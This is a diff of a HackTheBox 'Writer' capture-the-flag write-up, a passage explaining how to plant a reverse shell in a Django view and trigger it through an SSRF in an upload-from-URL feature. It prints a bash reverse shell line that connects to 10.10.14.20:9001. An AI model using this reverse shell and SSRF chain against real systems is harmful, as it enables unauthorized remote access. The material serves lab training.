MaxJackson13/HackTheBox/Writer/Writer.md

     return render(request,template_name)
 ```

-so I can write a reverse shell into the `home_page` function and it will execute when I load any page on the site.
+so I can write a reverse shell into the `home_page` function and it will execute when I the site.
 Since this site isn't accessible externally I'll need an SSRF to trigger the payload.
 An SSRF is when you send a specially crafted request to a server and the server executes a request on your behalf.
 This allows access to functionality you can't directly obtain.
 Luckily, when we uploaded the `.jpg` files to the `/stories` directory there was an option to upload from a url.
 If we get the server to process a request to `127.0.0.1:8080` we'll be able to execute our payload.

-I'll use the reverse shell `/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.20/9001 0>&1"`, base64 encode it to avoid special characters and use `os.sytem(.)` to execute shell commands.
+I'll use the reverse shell `/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.20/9001 0>&1"`, base64 encode it to avoid special characters and use `os.sytem()` to execute shell commands.
 All together `views.py` becomes

 ```
 from django.shortcuts import render